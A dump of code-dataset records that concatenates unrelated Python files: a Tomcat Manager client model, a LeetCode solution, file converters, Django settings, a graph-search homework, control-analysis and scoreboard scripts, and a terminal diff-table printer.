getfixture('tomcat')\n >>> try:\n ... r = tomcat.server_info()\n ... r.raise_for_status()\n ... if r.ok:\n ... print(r.server_info.os_name)\n ... else:\n ... print('Error: {}'.format(r.status_message))\n ... except Exception as err:\n ... # handle exception\n ... pass\n Linux\n\n \"\"\"\n\n def __init__(self, response=None):\n self._response = response\n self._status_code = None\n self._status_message = None\n self._result = None\n\n @property\n def ok(self):\n \"\"\"\n :return: True if the request completed with no errors.\n\n For this property to return True:\n\n - The HTTP request must return a status code of ``200 OK``\n - The first line of the response from the Tomcat Server must begin with ``OK``.\n \"\"\"\n return all([\n self.response is not None,\n self.response.status_code == requests.codes.ok,\n self.status_code == tm.status_codes.ok,\n ])\n\n def raise_for_status(self):\n \"\"\"\n Raise exceptions for server errors.\n\n First this method calls ``requests.Response.raise_for_status()`` which\n raises exceptions if a 4xx or 5xx response is received from the server.\n\n If that doesn't raise anything, then it raises a :class:`.TomcatError`\n if there is not an ``OK`` response from the first line of text back\n from the Tomcat Manager web app.\n \"\"\"\n self.response.raise_for_status()\n if self.status_code != tm.status_codes.ok:\n raise TomcatError(self.status_message)\n\n @property\n def status_code(self):\n \"\"\"\n Status of the Tomcat Manager command from the first line of text.\n\n The preferred way to check for success is to use the\n :meth:`~.TomcatManagerResponse.ok` method, because it checks for http\n errors as well as tomcat errors. However, if you want specific access\n to the status of the tomcat command, use this method.\n\n There are three status codes:\n\n - ``OK``\n - ``FAIL``\n - ``NOTFOUND``\n\n ``tomcatmanager.status_codes`` is a dictionary which makes it\n easy to check this code against known values. It also has attributes\n with friendly names, as shown here::\n\n >>> import tomcatmanager as tm\n >>> tomcat = getfixture('tomcat')\n >>> r = tomcat.server_info()\n >>> r.status_code == tm.status_codes.ok\n True\n \"\"\"\n return self._status_code\n\n @status_code.setter\n def status_code(self, value: str):\n self._status_code = value\n\n @property\n def status_message(self):\n \"\"\"\n The message on the first line of the response from the Tomcat Server.\n \"\"\"\n return self._status_message\n\n @status_message.setter\n def status_message(self, value: str):\n self._status_message = value\n\n @property\n def result(self):\n \"\"\"\n The text of the response from the Tomcat server, without the first\n line (which contains the status code and message).\n \"\"\"\n return self._result\n\n @result.setter\n def result(self, value: str):\n self._result = value\n\n @property\n def response(self) -> requests.models.Response:\n \"\"\"\n The server's response to an HTTP request.\n\n :class:`.TomcatManager` uses the excellent Requests package for HTTP\n communication. This property returns the ``requests.models.Response``\n object which contains the server's response to the HTTP request.\n\n Of particular use is ``requests.models.Response.text`` which contains\n the content of the response in unicode. If you want raw access to the\n content returned by the Tomcat Server, this is where you can get it.\n \"\"\"\n return self._response\n\n @response.setter\n def response(self, response: requests.models.Response):\n self._response = response\n # parse the text to get the status code and results\n if response.text:\n lines = response.text.splitlines()\n # get the status line, if the request completed OK\n if response.status_code == requests.codes.ok:\n try:\n statusline = response.text.splitlines()[0]\n code = statusline.split(' ', 1)[0]\n if code in tm.status_codes.values():\n self.status_code = code\n self.status_message = statusline.split(' ', 1)[1][2:]\n if len(lines) > 1:\n self.result = \"\\n\".join(lines[1:])\n else:\n self.status_code = tm.status_codes.notfound\n self.status_message = 'Tomcat Manager not found'\n except IndexError:\n pass\n\n\nAPPLICATION_STATES = [\n 'running',\n 'stopped',\n]\napplication_states = AttrDict()\n\"\"\"docstring for application_states\"\"\"\nfor _state in APPLICATION_STATES:\n application_states[_state] = _state\n\nTA = TypeVar('TA', bound='TomcatApplication')\nclass TomcatApplication():\n \"\"\"\n Discrete data about an application running inside a Tomcat Server.\n\n A list of these objects is returned by :meth:`.TomcatManager.list`.\n \"\"\"\n @classmethod\n def sort_by_state_by_path_by_version(cls, app: TA):\n \"\"\"\n Function to create a key usable by ``sort`` to sort by state, by path, by version.\n \"\"\"\n return '{}:{}:{}'.format(\n app.state or '',\n app.path or '',\n app.version or ''\n )\n\n @classmethod\n def sort_by_path_by_version_by_state(cls, app: TA):\n \"\"\"\n Function to create a key usable by ``sort`` to sort by path, by version, by state\n \"\"\"\n return '{}:{}:{}'.format(\n app.path or '',\n app.version or '',\n app.state or ''\n )\n\n def __init__(self):\n self._path = None\n self._state = None\n self._sessions = None\n self._directory = None\n self._version = None\n\n def __str__(self):\n \"\"\"Format this application as it comes from the tomcat server.\"\"\"\n fmt = \"{}:{}:{}:{}\"\n sessions = ''\n if self.sessions is not None:\n sessions = self.sessions\n return fmt.format(\n self.path or '',\n self.state or '',\n sessions,\n self.directory_and_version or ''\n )\n\n def __lt__(self, other: TA):\n \"\"\"\n Compare one object to another. Useful for sorting lists of apps.\n\n The sort order is by state (as string), by path (as string), by version\n (by string, if present).\n \"\"\"\n self_key = self.sort_by_state_by_path_by_version(self)\n other_key = self.sort_by_state_by_path_by_version(other)\n return self_key < other_key\n\n def parse(self, line: str):\n \"\"\"\n Parse a line from the server into this object.\n\n :param: line - the line of text from Tomcat Manager describing\n a deployed application\n\n Tomcat Manager outputs a line like this for each application:\n\n .. code-block:: none\n\n /shiny:running:0:shiny##v2.0.6\n\n The data elements in this line can be described as:\n\n .. code-block:: none\n\n {path}:{state}:{sessions}:{directory}##{version}\n\n Where version and the two hash marks that precede it are optional.\n \"\"\"\n app_details = line.rstrip().split(\":\")\n self._path, self._state, sessions, dirver = app_details[:4]\n self._sessions = int(sessions)\n dirver = dirver.split('##')\n self._directory = dirver[0]\n if len(dirver) == 1:\n self._version = None\n else:\n self._version = dirver[1]\n\n @property\n def path(self):\n \"\"\"\n The context path, or relative URL, where this app is available on the server.\n \"\"\"\n return self._path\n\n @property\n def state(self):\n \"\"\"\n The current state of the application.\n\n ``tomcatmanager.application_states`` is a dictionary of all the valid\n values for this property. In addition to being a dictionary, it also has\n attributes for each possible state::\n\n >>> import tomcatmanager as tm\n >>> tm.application_states['stopped']\n 'stopped'\n >>> tm.application_states.running\n 'running'\n \"\"\"\n return self._state\n\n @property\n def sessions(self):\n \"\"\"\n The number of currently active sessions.\n \"\"\"\n return self._sessions\n\n @property\n def directory(self):\n \"\"\"\n The directory on the server where this application resides.\n \"\"\"\n return self._directory\n\n @property\n def version(self):\n \"\"\"\n The version of the application given when it was deployed.\n\n If deployed without a version, this property returns None.\n \"\"\"\n return self._version\n\n @property\n def directory_and_version(self):\n \"\"\"\n Combine directory and version together.\n\n Tomcat provides this information as ``{directory}`` if there was no\n version specified when the application was deployed, or\n ``{directory}##{version}`` if the version was specified.\n\n This method has the logic to determine if version was specified or not.\n \"\"\"\n dandv = None\n if self.directory:\n dandv = self.directory\n if self.version:\n dandv += '##{}'.format(self.version)\n return dandv\n\n\nclass ServerInfo(dict):\n \"\"\"\n Discrete data about the Tomcat server.\n\n This object is a dictionary of keys and values as returned from the\n Tomcat server. It also has properties for well-known values.\n\n Usage::\n\n >>> tomcat = getfixture('tomcat')\n >>> r = tomcat.server_info()\n >>> r.server_info['OS Architecture'] # doctest: +ELLIPSIS\n '...'\n >>> r.server_info.jvm_vendor # doctest: +ELLIPSIS\n '...'\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialize from the plain text response from a Tomcat server.\n\n :param result: the plain text from the server, minus the first\n line with the status info\n \"\"\"\n super().__init__(*args, **kwargs)\n self._tomcat_version = None\n self._os_name = None\n self._os_version = None\n self._os_architecture = None\n self._jvm_version = None\n self._jvm_vendor = None\n result = kwargs.pop('result', None)\n self._parse(result)\n\n def _parse(self, result: str):\n \"\"\"Parse up a list of lines from the server.\"\"\"\n if result:\n for line in result.splitlines():\n key, value = line.rstrip().split(':', 1)\n self[key] = value.lstrip()\n\n self._tomcat_version = self['Tomcat Version']\n self._os_name = self['OS Name']\n self._os_version = self['OS Version']\n self._os_architecture = self['OS Architecture']\n self._jvm_version = self['JVM Version']\n self._jvm_vendor = self['JVM Vendor']\n\n @property\n def tomcat_version(self):\n \"\"\"The tomcat version string.\"\"\"\n return self._tomcat_version\n\n @property\n def os_name(self):\n \"\"\"The operating system name.\"\"\"\n return self._os_name\n\n @property\n def os_version(self):\n \"\"\"The operating system version.\"\"\"\n return self._os_version\n\n @property\n def os_architecture(self):\n \"\"\"The operating system architecture.\"\"\"\n return self._os_architecture\n\n @property\n def jvm_version(self):\n \"\"\"The java virtual machine version string.\"\"\"\n return self._jvm_version\n\n @property\n def jvm_vendor(self):\n \"\"\"The java virtual machine vendor.\"\"\"\n return self._jvm_vendor\n","sub_path":"src/tomcatmanager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"501497208","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def isCompleteTree(self, root: Optional[TreeNode]) -> bool:\n queue = deque([root])\n hasNull = 0\n while queue:\n node = queue.popleft()\n if not node:\n hasNull = 1\n continue\n if hasNull:\n return False\n queue.append(node.left)\n queue.append(node.right)\n\n return True\n","sub_path":"src/tree/958.py","file_name":"958.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615785509","text":"'''\nConverts python dictionaries that are stored in\npickle files into hickle files for speed improvement.\n'''\n\nimport hickle, pickle\nimport argparse\n\n\ndef _run():\n args = _get_args()\n print('load pickle file...')\n info_dict = _load_data_pickle(args.input_file)\n print('done.\\ndump hickle file...')\n with open(args.input_file.replace('.pkl','.hkl'), 'w') as f:\n hickle.dump(info_dict, f)\n print('conversion done')\n\n\ndef _load_data_pickle(file_name):\n try:\n with open(file_name, \"rb\") as pkl_file:\n data = pickle.load(pkl_file)\n pkl_file.close()\n return data\n except IOError as e:\n print(\"({})\".format(e))\n\n\ndef _get_args():\n help_input_file = \"Pickle metadata input file\"\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('input_file',\n help=help_input_file)\n parser.add_argument('-v', '--verbose', action='store_true',\n help='increase output verbosity')\n args = parser.parse_args()\n if args.verbose:\n print('Will convert the following:\\n Input pickle file: {}\\n'.format(args.input_file))\n return args\n\n\nif __name__ == \"__main__\":\n _run()\n","sub_path":"converter/PickleToHickle.py","file_name":"PickleToHickle.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642174247","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-e','--eval',dest = 'eval',default = 0.01,type=float,help = 'evalue cutoff, optional (default: 1)', required = False)\nparser.add_argument('-i','--in',dest = 'in_', help = 'input file name, required')\nparser.add_argument('-o','--out',dest = 'out_', default = 'output.txt', help = 'output file name, optional (default: output.txt)', required = False)\n\nargs = parser.parse_args()\nevalue_cut = args.eval\nin_file_name = args.in_\nout_file_name = args.out_\n\ninput_file = open(in_file_name)\noutput_file = open(out_file_name, \"w\")\ngene_list = []\n\n\ndef dict_making (gene_list): \n\n\tdict_ = {}\n\tfor line in input_file:\n\t\t\n\t\tline_= line.split()\n\t\tgene_list.append(line_[0]) #??\n\t\t\n\t\tif line_[0] not in dict_:\n\t\t\tdict_[line_[0]] = []\n\n\t\tif line_[0] in dict_:\n\t\t\tdict_[line_[0]].append( (line_[1], line_[10]) )\n\n\treturn dict_\n\ndef searching (dict_,gene_list):\n\t\n\tcounting = 0\n\tok = 0\n\tsingle = [] \n\tmulti = [] \n\tgene_list2 = set(gene_list)\n\n\tfor key, value in dict_.items():\n\n\t\tif len(value) == 1:\n\t\t\tif key == value[0][0]:\n\t\t\t\tsingle.append(key)\n\n\t\telse:\t\n\t\t\tfor i in range(len(value)):\n\t\t\t\tif value[i][0] not in gene_list2:\n\t\t\t\t\tif ok == 0:\n\t\t\t\t\t\tmini = value[i][1]\n\t\t\t\t\t\tmini_id = value[i][0]\n\t\t\t\t\tok += 1\n\n\t\t\t\t\tif float(value[i][1]) >= evalue_cut:\n\t\t\t\t\t\tcounting += 1\n\n\t\t\t\t\t\tif value[i][1] < mini:\n\t\t\t\t\t\t\tmini = value[i][1]\n\t\t\t\t\t\t\tmini_id = value[i][0]\n\t\t\tif ok != 0:\n\t\t\t\tif counting == ok:\n\t\t\t\t\tmulti.append((key,len(value),mini_id,mini))\n\t\t\tcounting = 0\n\t\t\tok = 0\n\t\t\t\n\tfor i in range(len(single)):\n\t\toutput_file.write(single[i] + '\\t0\\n')\n\n\tfor i in range(len(multi)):\n\t\toutput_file.write(multi[i][0] + '\\t' + str(multi[i][1]) + '\\t' + multi[i][2] + '\\t' + str(multi[i][3]) + '\\n')\n\n\n\ndict_ = dict_making(gene_list) \nsearching(dict_,gene_list)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2360676","text":"from os import path\nfrom random import seed, choice\nfrom time import time\nimport json\n\nDATA_PY = path.abspath(path.dirname(__file__))\nDATA_DIR = path.normpath(path.join(DATA_PY, '..', 'data'))\n\ndef read_data(type, name):\n file = open(path.join(DATA_DIR, type, name + \".dat\")).read()\n data = json.JSONDecoder().decode(file)\n return data\n\nclass Die(object):\n def __init__(self, sides=6):\n try:\n self.sides = range(1, sides)\n except TypeError:\n self.sides = list(sides)\n\n def roll(self, times=1):\n t = time()\n seed(t)\n total = 0\n for i in range(1, times + 1):\n roll = choice(self.sides)\n total += roll\n return total\n","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474085721","text":"\"\"\"Setting for development environment\"\"\"\n\nfrom .base import *\n\nDEBUG = True\n\n# Bend the Django cache to use the redis container\nCACHES[\"default\"][\"LOCATION\"] = \"redis://cathapi-redis:6379/1\"\n\n# Bend the broker to the redis container\nBROKER_URL = 'redis://cathapi-redis:6379'\nCELERY_RESULT_BACKEND = 'redis://cathapi-redis:6379'\n\n# These settings make sure any tasks run in testing \n# are run locally with the 'test' database\nCELERY_ALWAYS_EAGER = True\nTEST_RUNNER = 'djcelery.contrib.test_runner.CeleryTestSuiteRunner'\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join('/cathapi-data', 'db.sqlite3'),\n }\n}\n\nINSTALLED_APPS += [\n # 'debug_toolbar',\n]\n\nSTATICFILES_DIRS = [\n os.path.join('static/'),\n]\n\nSTATIC_ROOT = '/static'\n\n#MIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]\n","sub_path":"cathapi/cathapi/settings/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3536106","text":"\"\"\"\n\nThis program will answer part one of hw5 for scripting\n\n1) A function to create a random graph. This function will take a single parameter for the number\nof nodes in the graph, and will return a NetworkX undirected graph object.\n\n2) A function that implements a depth-first search of a graph. This function will take two\nparameters: a NetworkX graph object and the node at which to start the search. It will return a\nlist of node names in the order they were visited. (Hint: use a stack to implement this algorithm)\n\n3) A function that implements a breadth-first search of a graph. This function will take two\nparameters: a NetworkX graph object and the node at which to start the search. It will return a\nlist of node names in the order they were visited. (Hint: use a queue to implement this\nalgorithm)\n\n\"\"\"\n\n## import statements\nimport sys\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\n\n## function / class definitions\ndef random_graph(nnodes, connect):\n DG = nx.DiGraph()\n\n nodes = range(nnodes)\n\n DG.add_nodes_from(nodes)\n\n links = []\n\n random.seed(15)\n\n for i in nodes: ## modify to remove double connections?\n for j in nodes:\n roll = random.randint(0, connect)\n\n if roll == 0:\n links.append((i, j))\n\n DG.add_edges_from(links)\n\n nx.draw_random(DG) ## ************\n plt.draw()\n #plt.show()\n\n namenodes = {}\n\n for item in nodes:\n namenodes[item] = {'node number' : str(item)}\n\n nx.set_node_attributes(DG, namenodes)\n #nodenames = nx.get_node_attributes(DG, 'node number')\n\n return DG\n\n\n\ndef depth_search(graph, start):\n\n all = {} ## dictionary of new adjacent nodes from each node\n ## key is node number and value is list of adjacent (unvisited) node numbers\n\n tier = 0\n pick = 0 ## depth first -- grab first list element for all, then second, etc.\n nodenum = start ## start at node 0 -- this is fed in as function argument\n\n def all_append(dict, level, ind, id, graph_id, check):\n dict[(level, ind)] = (id, [x for x in nx.all_neighbors(graph_id, id) if x not in check])\n ## dict is all, level is tier, ind is pick / num in list, id is nodenum, graph_id is graph, check is covered\n\n tierset = tier\n nodenumset = nodenum\n covered = [] ## nodes that have been searched\n ## using covered in this way will ignore connections to nodes that have already been searched\n\n all_append(all, tier, pick, nodenum, graph, covered)\n\n\n covered.append(nodenum)\n\n print(all)\n\n a = True #########\n while a == True:\n\n while all[tier, pick] != []:\n neighbors = all[tier, pick]\n nodenum = neighbors[pick]\n tier += 1\n covered.append(nodenum)\n\n all_append(all, tier, pick, nodenum, graph, covered)\n\n print(all)\n #print(\"cycle\") ###########\n\n break\n\n tier -= 1\n pick += 1\n\n\n\n ## I need to rethink this -- don't want to have to specify node in dict key\n ## should be tuple of (tier, pick)\n ## nodenum will be stored in value\n ## so value will be tuple (nodenum, list_of_adjacents)\n\n\n\n \n\n\n\n ## run this for loop again and again -- will need to put it into larger loop\n ## that should do it\n\n\n\n\n \"\"\"\n possibly use recursion -- wrap this process of going one level deeper if there is another level into\n its own function, then run that function within a loop? \n \n \"\"\"\n\n ## throw this in a while loop ^ & iterate thru tiers and nodes in each tier\n\n ## this structure should work for 2 and 3 -- just will move thru it in a different order\n\n print(all)\n print(covered) ## also need to show order in which nodes were visited -- this is 'covered'\n\ndef breadth_search(graph, start):\n all = {} ## dictionary of new adjacent nodes from each node\n ## key is node number and value is list of adjacent (unvisited) node numbers\n\n tier = 0\n nodenum = start ## start at node 0 -- this is fed in as function argument\n\n def all_append(dict, level, id, graph_id, check):\n dict[(level, id)] = [x for x in nx.all_neighbors(graph_id, id) if x not in check]\n ## dict is all, level is tier, id is nodenum, graph_id is graph, check is covered\n\n tierset = tier\n nodenumset = nodenum\n covered = [] ## nodes that have been searched\n ## using covered in this way will ignore connections to nodes that have already been searched\n\n all_append(all, tier, nodenum, graph, covered)\n\n covered.append(nodenum)\n\n tier += 1\n for adjacent in all[(tierset, nodenumset)]:\n nodenum = adjacent\n covered.append(nodenum)\n\n all_append(all, tier, nodenum, graph, covered)\n\n ## run this for loop again and again -- will need to put it into larger loop\n ## that should do it\n\n \"\"\"\n possibly use recursion -- wrap this process of going one level deeper if there is another level into\n its own function, then run that function within a loop? \n\n \"\"\"\n\n ## throw this in a while loop ^ & iterate thru tiers and nodes in each tier\n\n ## this structure should work for 2 and 3 -- just will move thru it in a different order\n\n print(all)\n print(covered) ## also need to show order in which nodes were visited -- this is 'covered'\n\n## main function definition\ndef main():\n graph = random_graph(10, 4)\n #plt.show() ## ***********\n\n depth_search(graph, 0)\n\n\n## run main function\nif __name__ == \"__main__\":\n main()","sub_path":"hw5/hw5_1.9.py","file_name":"hw5_1.9.py","file_ext":"py","file_size_in_byte":5530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"291959685","text":"from PIL import Image, ImageDraw\ndef gradient(choose):\n new_image = Image.new(\"RGB\", (512, 200), (0, 0, 0))\n draw = ImageDraw.Draw(new_image)\n r = 0\n g = 0\n b = 0\n for i in range(new_image.size[0]):\n draw.line((i, 0, i, 512), fill=(r, g, b), width=2)\n if i % 4 == 0:\n if choose == \"R\":\n r += 2\n elif choose == \"G\":\n g += 2\n else:\n b += 2\n new_image.save(\"res.png\", \"PNG\")\ngradient('R')","sub_path":"python/lab3_python/26.1.py","file_name":"26.1.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372335182","text":"\"\"\" A program for analyzing multiple controllers for force control.\n\"\"\"\nimport SLSsyn as Ss\nimport control as co\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Jan09_plant_pool as mo\nfrom collections import OrderedDict\n\n\nif __name__ == '__main__':\n Ts = 0.008\n s = co.tf([1, 0], [1])\n\n # plants definition:\n # - Link stiffness is identified to be 60 N/mm. To be clear, this stiffness level is\n # not from the link only, it has effect from the foam table surface as well.\n # - The softest environment is created from those foam sheets. Stiffness level 3.8 N/mm\n # - The stiffest environment are the blocks. Their stiffnesses can be up to 200 N/mm. Because\n # of this omega_add is assign -30 to check for stability.\n plants = OrderedDict([\n ('nominal', mo.PlantV2.plant(K_env=3.8, omega_add=-30, K_env_aug=40)),\n # ('freespace', mo.PlantV2.plant(K_env=10e-3)),\n # ('stiff', mo.PlantV2.plant(K_env=20, K_env_aug=10)),\n ('stiffer', mo.PlantV2.plant(K_env=40, K_env_aug=10)),\n ('stiffest', mo.PlantV2.plant(K_env=60, K_env_aug=10)),\n ('stiffest2', mo.PlantV2.plant(K_env=80, K_env_aug=10))\n ])\n\n # controller descriptions:\n # c0 = mo.Controllers.PI_v1(0, 8e-1)\n c0 = mo.Controllers.Qsyn(filename=\"Jan09_controller_statespace_general_configuration.npz\")\n\n # analysis mode, nothing special, just step output and Nyquist to check the condition of robust stability.\n omega_interested = [1, 5, 10, 20, 40, 80, 100, 200]\n analysis_dict = {\n 'row_col': (3, 2),\n 'freqs': np.logspace(-3, 2.56, 500),\n 'recipe': [\n (0, 0, \"step\", (0, 0)),\n (0, 0, \"step\", (0, 1)),\n (0, 1, \"step\", (1, 0)),\n (1, 0, \"nyquist\", (3, 3), omega_interested),\n (1, 1, \"bode_mag\", (1, 0), omega_interested),\n (2, 1, \"bode_mag\", (0, 0), omega_interested),\n (2, 0, \"bode_mag\", (2, 0), omega_interested),\n ]\n }\n for plant_key in plants:\n Ss.analysis(plants[plant_key], c0, analysis_dict,\n input_descriptions=mo.PlantV2.input_descriptions,\n output_descriptions=mo.PlantV2.output_descriptions,\n controller_name=plant_key, nb_sim_steps=500)\n","sub_path":"infinite_interaction/SLS-scripts/Jan09_controllers_analysis.py","file_name":"Jan09_controllers_analysis.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262704752","text":"class Scoreboard(object):\r\n class Entry(object):\r\n def __init__(self, name, score):\r\n self.name = name\r\n self.score = score\r\n self.nextEntry = None\r\n \r\n @property\r\n def name(self):\r\n return self.__name\r\n\r\n @property\r\n def score(self):\r\n return self.__score\r\n\r\n @property\r\n def nextEntry(self):\r\n return self.__nextEntry\r\n\r\n @name.setter\r\n def name(self, nameIn):\r\n if not isinstance(nameIn, str):\r\n raise RuntimeError(nameIn + 'is not a valid name for score entry')\r\n self.__name = nameIn\r\n \r\n @score.setter\r\n def score(self, scoreIn):\r\n if not isinstance(scoreIn, int):\r\n raise RuntimeError(scoreIn + 'is not a valid score for score entry')\r\n self.__score = scoreIn\r\n\r\n @nextEntry.setter\r\n def nextEntry(self, entryIn):\r\n if not (isinstance(entryIn, self.__class__) or entryIn == None):\r\n raise RuntimeError(entryIn + 'is not a valid assignment for nextEntry')\r\n self.__nextEntry = entryIn\r\n\r\n def __str__(self):\r\n return self.name + ' | ' + str(self.score)\r\n \r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.readFromFile('resources/event_scrolls/highscores.asset')\r\n\r\n @property\r\n def head(self):\r\n return self.__head\r\n\r\n @property\r\n def tail(self):\r\n return self.__tail\r\n\r\n @head.setter\r\n def head(self, value):\r\n if not isinstance(value, Scoreboard.Entry) and value != None:\r\n raise RuntimeError(value + 'is not a valid head entry.')\r\n self.__head = value\r\n\r\n @tail.setter\r\n def tail(self, value):\r\n if not isinstance(value, Scoreboard.Entry) and value != None:\r\n raise RuntimeError(value + 'is not a valid head entry.')\r\n self.__tail = value\r\n\r\n def add(self, name, score):\r\n entry = self.Entry(name, score)\r\n if self.head == None:\r\n self.head = entry\r\n self.tail = entry\r\n\r\n if self.head.score < entry.score:\r\n entry.nextEntry = self.head\r\n self.head = entry\r\n else:\r\n currEntry = self.head\r\n while currEntry.nextEntry != None and currEntry.nextEntry.score >= entry.score:\r\n currEntry = currEntry.nextEntry\r\n entry.nextEntry = currEntry.nextEntry\r\n currEntry.nextEntry = entry\r\n self.__trim()\r\n\r\n def resetList(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def belongsOnList(self, score):\r\n return score > self.tail.score\r\n\r\n def writeToFile(self, filename):\r\n fileName = open(filename, 'w')\r\n currEntry = self.head\r\n while currEntry.nextEntry:\r\n if currEntry.nextEntry.nextEntry != None:\r\n fileName.write(currEntry.name+'.'+str(currEntry.score)+',')\r\n else:\r\n fileName.write(currEntry.name+'.'+str(currEntry.score))\r\n currEntry = currEntry.nextEntry\r\n fileName.close()\r\n\r\n def readFromFile(self, fileName):\r\n with open(fileName) as f:\r\n read_data = f.read().split(',')\r\n for entry in read_data:\r\n temp = entry.split('.')\r\n self.add(temp[0],int(temp[1]))\r\n\r\n\r\n def __trim(self):\r\n currEntry = self.head\r\n i = 0\r\n while currEntry.nextEntry != None and i < 20:\r\n currEntry = currEntry.nextEntry\r\n i += 1\r\n self.tail = currEntry\r\n self.tail.nextEntry = None \r\n\r\n def __str__(self):\r\n result = '***HALL OF FAME!***\\n'\r\n currEntry = self.head\r\n i = 1\r\n #result += str(i) + ') ' + str(currEntry) + '\\n'\r\n #i += 1\r\n while currEntry.nextEntry:\r\n result += str(i) + ') ' + str(currEntry) + '\\n'\r\n i += 1\r\n currEntry = currEntry.nextEntry\r\n result += str(i) + ') ' + str(currEntry) + '\\n'\r\n return result\r\n\r\n\r\n \r\n","sub_path":"highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"485521131","text":"from termcolor import colored as clr, cprint\nfrom itertools import zip_longest\nimport os\n\n\nclass Table:\n try:\n columns, rows = os.get_terminal_size()\n columns -= 15\n except:\n columns = 100\n box_weight = columns // 2\n\n table_color = 'white'\n keyword = 'yellow'\n accepted = 'green'\n wrong = 'red'\n information = 'white'\n\n dif_sign = clr('|', table_color, attrs=['bold'])\n\n @staticmethod\n def multiple(n, value=' '):\n s = value * n\n return s\n\n def separator(self, value='-'):\n cprint(self.multiple(self.box_weight * 2 + 5 + 8, clr(value, self.table_color, attrs=['bold'])),\n self.table_color)\n\n def header(self, col1, col2):\n\n self.separator()\n\n print(self.dif_sign + clr(' LN ', self.keyword) + self.dif_sign, end='')\n\n before = (self.box_weight - len(col1)) / 2\n before = int(before)\n after = self.box_weight - before - len(col1)\n\n print(self.multiple(before, ' ') + clr(col1, self.keyword) + self.multiple(after, ' '), end='')\n print(self.dif_sign, end='')\n\n print(clr(' LN ', self.keyword) + self.dif_sign, end='')\n\n before = (self.box_weight - len(col2)) / 2\n before = int(before)\n after = self.box_weight - before - len(col2)\n\n print(self.multiple(before) + clr(col2, self.keyword) + self.multiple(after), end='')\n print(self.dif_sign, end='')\n\n print()\n\n self.separator()\n\n @staticmethod\n def value_rectifier(s, strip_ok=False):\n s = s.replace('\\r', '')\n if strip_ok:\n s = s.strip()\n return s\n\n def line_print(self, no, x, y):\n\n pt = []\n x = self.value_rectifier(x)\n y = self.value_rectifier(y)\n\n for o, e in zip_longest(x, y, fillvalue=''):\n if o == e:\n pt.append(clr(o, self.accepted))\n else:\n pt.append(clr(o, self.wrong))\n\n sx = len(x)\n sy = len(y)\n curr = 0\n\n x_null = False\n y_null = False\n\n if x == '(#$null$#)':\n x_null = True\n\n if y == '(#$null$#)':\n y_null = True\n\n s_max = max(sx, sy)\n line_col = 'cyan'\n\n if x != y:\n line_col = 'red'\n\n while curr <= s_max:\n\n print(self.dif_sign + ' ' + clr(no, line_col) + ' ' * (3 - len(no)) + self.dif_sign, end='')\n tx = ''\n if x_null:\n tx = clr('(null)', self.information) + ' ' * (self.box_weight - 6)\n else:\n for i in range(curr, curr + self.box_weight):\n if i < sx:\n tx += pt[i]\n else:\n tx += ' ' * (self.box_weight - (i - curr))\n break\n\n print(tx + self.dif_sign, end='')\n\n print(' ' + clr(no, 'cyan') + ' ' * (3 - len(no)) + self.dif_sign, end='')\n tx = ''\n if y_null:\n tx = clr('(null)', self.information) + ' ' * (self.box_weight - 6)\n else:\n for i in range(curr, curr + self.box_weight):\n if i < sy:\n tx += clr(y[i], self.accepted)\n else:\n tx += ' ' * (self.box_weight - (i - curr))\n break\n\n print(tx + self.dif_sign)\n\n curr += self.box_weight\n no = ''\n\n def print(self, output, expected, col1='Output', col2='Expected'):\n\n self.header(col1, col2)\n\n x_empty = False\n y_empty = False\n\n vx, vy = '', ''\n\n if output == '':\n x_empty = True\n\n if expected == '':\n y_empty = True\n x = output.split(sep='\\n')\n y = expected.split(sep='\\n')\n\n sx = len(x)\n sy = len(y)\n\n total_line = max(sx, sy)\n\n for no in range(total_line):\n try:\n vx = x[no]\n except:\n x_empty = True\n try:\n vy = y[no]\n except:\n y_empty = True\n\n if x_empty:\n vx = '(#$null$#)'\n if y_empty:\n vy = '(#$null$#)'\n self.line_print(str(no + 1), vx, vy)\n\n self.separator()\n","sub_path":"build/lib/tools/OJ/CP/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125216702","text":"# -*- coding:utf-8 -*-\nfrom django.conf.urls import patterns, include, url\n\n\n\n\nurlpatterns = patterns('',\n 